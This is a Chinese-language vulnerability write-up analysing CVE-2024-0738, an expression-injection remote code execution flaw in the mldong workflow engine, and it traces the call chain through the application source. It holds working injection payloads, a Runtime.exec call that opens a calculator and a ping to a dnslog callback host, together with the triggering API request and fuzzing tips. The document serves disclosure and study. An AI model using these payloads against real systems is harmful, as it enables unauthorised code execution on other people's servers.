A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.
个人开源mldong 1.0中发现一个严重漏洞。此问题影响文件 com/mldong/modules/wf/engine/model/DecisionModel.java 的 ExpressionEngine 函数。这种操纵会导致代码注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。
相关参考
NVD - CVE-2024-0738https://nvd.nist.gov/vuln/detail/CVE-2024-0738
https://github.com/biantaibao/mldong_RCE/blob/main/RCE.mdhttps://github.com/biantaibao/mldong_RCE/blob/main/RCE.md
mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎https://gitee.com/mldong/mldong
在mldong项目中DecisionModel类里有一个exec方法,它似乎可以执行表达式
这个ExpressionUtil.eval引起了我们的兴趣。
本地建立文件,测试这行代码是否存在表达式注入。
(测试环境最好在本项目中,保持环境包的一致性)
import cn.hutool.extra.expression.ExpressionUtil;
import java.util.HashMap;
import java.util.Map;
public class Test {
public static void main(String[] args) {
String expression = "T(java.lang.Runtime).getRuntime().exec('calc')";
Map context = new HashMap<>();
context.put("a", 1);
context.put("b", 2);
context.put("c", 3);
Object result = ExpressionUtil.eval(expression, context);
System.out.println(result);
}
}
技巧:
1.通过这个包ExpressionUtil在网上找寻使用示例代码或使用手册,再凭经验修改相关参数为表达式payload以造成命令执行。
2.表达式的payload可以网上输入关键字收集,比如搜索cn.hutool.extra.expression.ExpressionUtil 表达式注入 历史漏洞什么。
3.有了足够多的payload就可以做模糊测试了
本机计算机弹出,项目的确存在RCE漏洞
发现了漏洞点,如何寻找调用的接口,这里提供了几个技巧(还有什么技巧,请大佬补充)
1,右键找相关函数的usages,逐个分析
2,打上断点,前端点击功能看看那个接口会卡住
我这里右键找exec的usages
public abstract class NodeModel extends BaseModel implements Action {
private String layout;// 布局属性(x,y,w,h)
// 输入边集合
private List inputs = new ArrayList();
// 输出边集合
private List outputs = new ArrayList();
private String preInterceptors; // 节点前置拦截器
private String postInterceptors; // 节点后置拦截器
/**
* 由子类自定义执行方法
* @param execution
*/
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {
// 0.设置当前节点模型
execution.setNodeModel(this);
// 1. 调用前置拦截器
execPreInterceptors(execution);
// 2. 调用子类的exec方法
exec(execution);
// 3. 调用后置拦截器
execPostInterceptors(execution);
}
再次右键找execute的usages...
后面我就遇到了很多困难,因为java的继承类 接口实现类需要挨个分析 也不排除重名现象。如果想分析到接口层,可得下一番功夫。
这里我们先跳过这一步,来到前端的功能页面寻找相关的线索。....
待漏洞复现完毕后 我们再分析接口的调用!
.....
进入后台管理在流程设计页面中新增流程设计
右键 设置流程属性
添加这样的流程
点击条件判断的框
准备payload 打dns
T(java.lang.Runtime).getRuntime().exec('ping xxxx.dnslog.cn')
保存 部署 准备执行
来到流程定义开始执行
顺便添几个 点击确定
查看dnslog结果
ok rce成功复现
post数据参考
POST /api/wf/processDefine/startAndExecute HTTP/1.1
Host:
Connection: close{"processDefineId":"1749714638596308993","f_startTime":["2024-01-23 ",null],"f_endTime":["2024-01-25 ",null],"f_reasonType":2,"f_day":2.5,"f_title":"test"}
来到后端
@PostMapping("/wf/processDefine/startAndExecute")
@ApiOperation(value = "启动流程实例")
@SaCheckPermission(value = {"wf:processDefine:startAndExecute","wf:processDesign:listByType"}, mode = SaMode.OR)
public CommonResult> startAndExecute(@RequestBody Dict args) {
Long processDefineId = args.getLong(FlowConst.PROCESS_DEFINE_ID_KEY);
args.remove(FlowConst.PROCESS_DEFINE_ID_KEY);
processInstanceService.startAndExecute(processDefineId,args);
return CommonResult.ok();
}
跟进startAndExecute
public class ProcessInstanceServiceImpl extends ServiceImpl implements ProcessInstanceService {
...
private final ProcessTaskMapper processTaskMapper;
private final ProcessCcInstanceMapper processCcInstanceMapper;
@Override
@Transactional(rollbackFor = Exception.class)
public void startAndExecute(Long processDefineId, Dict args) {
String operator = LoginUserHolder.getUserId().toString();
FlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);
ProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId,operator,args);
List processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(),new String[]{});
// 取任务自动执行
processTaskList.forEach(processTask -> {
args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());
flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);
});
}
...
}
在方法中,首先获取当前登录用户的操作员 ID:
javaCopy CodeString operator = LoginUserHolder.getUserId().toString();然后,获取
FlowEngine
实例:javaCopy CodeFlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);接下来,使用
flowEngine
实例的startProcessInstanceById
方法启动一个流程实例,并传入processDefineId
、operator
和args
参数:javaCopy CodeProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId, operator, args);然后,使用
flowEngine
实例的processTaskService()
方法获取正在进行中的任务列表:javaCopy CodeListprocessTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(), new String[]{}); 接下来,对任务列表进行遍历,并自动执行每个任务:
javaCopy CodeprocessTaskList.forEach(processTask -> { args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode()); flowEngine.executeProcessTask(processTask.getId(), FlowConst.AUTO_ID, args); });
跟进 flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);
public class FlowEngineImpl implements FlowEngine {
protected Configuration configuration;
private ProcessDefineService processDefineService;
private ProcessInstanceService processInstanceService;
private ProcessTaskService processTaskService;
...
@Override
@Transactional(rollbackFor = Exception.class)
public List executeProcessTask(Long processTaskId, String operator, Dict args) {
Execution execution = execute(processTaskId,operator,args);
if(execution == null) return Collections.emptyList();
ProcessModel processModel = execution.getProcessModel();
// 7. 根据流程任务名称获取对应的任务节点模型
NodeModel nodeModel = processModel.getNode(execution.getProcessTask().getTaskName());
// 8. 调用节点模型执行方法
nodeModel.execute(execution);
return execution.getProcessTaskList();
}
...
}
这段代码首先调用
execute
方法来执行指定的流程任务,并将执行结果保存在一个Execution
对象中。如果execute
方法返回的Execution
对象为 null,则直接返回一个空列表。接着,代码从
Execution
对象中获取了当前任务所属的流程模型(ProcessModel
对象),并根据当前任务名称获取了对应的节点模型(NodeModel
对象)。最后,代码调用了该节点模型的execute
方法来完成任务的执行。需要注意的是,该方法使用了
@Transactional
注解来添加事务支持,保证代码在执行过程中出现异常时可以进行回滚。同时,该方法还使用了Dict
类型的参数来传递一些额外的参数信息,以便在执行过程中进行相关操作。
跟进Execution execution = execute(processTaskId,operator,args); 看看对参数的处理
public class FlowEngineImpl implements FlowEngine {
protected Configuration configuration;
private ProcessDefineService processDefineService;
private ProcessInstanceService processInstanceService;
private ProcessTaskService processTaskService;
...
/**
* 生成执行对象
* @param processTaskId
* @param operator
* @param args
* @return
*/
private Execution execute(Long processTaskId, String operator, Dict args) {
// 1.1 根据id查询正在进行中的流程任务
ProcessTask processTask = processTaskService.getById(processTaskId);
if(processTask == null || !ProcessTaskStateEnum.DOING.getCode().equals(processTask.getTaskState())) {
throw new JFlowException(WfErrEnum.NOT_FOUND_DOING_PROCESS_TASK);
}
// 1.2 判断是否可以执行任务
if(!processTaskService.isAllowed(processTask,operator)) {
// 当前参与者不能执行该流程任务
throw new JFlowException(WfErrEnum.NOT_ALLOWED_EXECUTE);
}
// 2. 根据流程任务查询流程实例
ProcessInstance processInstance = processInstanceService.getById(processTask.getProcessInstanceId());
// 3. 根据流程实例查询流程定义
ProcessDefine processDefine = processDefineService.getById(processInstance.getProcessDefineId());
// 4. 将流程定义文件转成流程模型
ProcessModel processModel = ModelParser.parse(processDefine.getContent());
// 5. 将流程任务状态修改为已完成
processTaskService.finishProcessTask(processTaskId,operator,args);
processTask.setTaskState(ProcessTaskStateEnum.FINISHED.getCode());
// 6. 根据流程定义、实例、任务构建执行参数对象
Execution execution = new Execution();
execution.setProcessModel(processModel);
execution.setProcessInstance(processInstance);
execution.setProcessInstanceId(processInstance.getId());
execution.setProcessTask(processTask);
execution.setProcessTaskId(processTaskId);
execution.setOperator(operator);
execution.setEngine(this);
Dict processInstanceVariable = JSONUtil.toBean(processInstance.getVariable(),Dict.class);
Dict newArgs = Dict.create();
newArgs.putAll(processInstanceVariable);
newArgs.putAll(args);
execution.setArgs(newArgs);
// 如果提交参数中存在f_前辍参数,则更新到流程实例变量中
Dict addArgs = Dict.create();
args.forEach((key,value)->{
if(key.startsWith(FlowConst.FORM_DATA_PREFIX)) {
addArgs.put(key,value);
}
});
if(ObjectUtil.isNotEmpty(addArgs)) {
processInstanceService.addVariable(processInstance.getId(), addArgs);
}
return execution;
}
...
}
得到execution对象,返回进入nodeModel.execute(execution);
public abstract class NodeModel extends BaseModel implements Action {
private String layout;// 布局属性(x,y,w,h)
// 输入边集合
private List inputs = new ArrayList();
// 输出边集合
private List outputs = new ArrayList();
private String preInterceptors; // 节点前置拦截器
private String postInterceptors; // 节点后置拦截器
/**
* 由子类自定义执行方法
* @param execution
*/
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {
// 0.设置当前节点模型
execution.setNodeModel(this);
// 1. 调用前置拦截器
execPreInterceptors(execution);
// 2. 调用子类的exec方法
exec(execution);
// 3. 调用后置拦截器
execPostInterceptors(execution);
}
进入exec方法,这就来到了触发漏洞点的地方
public class DecisionModel extends NodeModel {
private String expr; // 决策表达式
private String handleClass; // 决策处理类
@Override
public void exec(Execution execution) {
// 执行决策节点自定义执行逻辑
boolean isFound = false;
String nextNodeName = null;
if(StrUtil.isNotEmpty(expr)) {
Object obj = ExpressionUtil.eval(expr, execution.getArgs());//漏洞触发点
nextNodeName = Convert.toStr(obj,"");
} else if(StrUtil.isNotEmpty(handleClass)) {
DecisionHandler decisionHandler = ReflectUtil.newInstance(handleClass);
nextNodeName = decisionHandler.decide(execution);
}
for(TransitionModel transitionModel: getOutputs()){
if (StrUtil.isNotEmpty(transitionModel.getExpr()) && Convert.toBool(ExpressionUtil.eval(transitionModel.getExpr(), execution.getArgs()), false)) {
// 决策节点输出边存在表达式,则使用输出边的表达式,true则执行
isFound = true;
transitionModel.setEnabled(true);
transitionModel.execute(execution);
} else if(transitionModel.getTo().equalsIgnoreCase(nextNodeName)) {
// 找到对应的下一个节点
isFound = true;
transitionModel.setEnabled(true);
transitionModel.execute(execution);
}
}
if(!isFound) {
// 找不到下一个可执行路线
throw new JFlowException(WfErrEnum.NOT_FOUND_NEXT_NODE);
}
}
}
本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。
本次漏洞研究发的包有点复杂,就不附赠poc。有想法的小伙伴可以尝试一下
至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...
欢迎大佬评论区留言,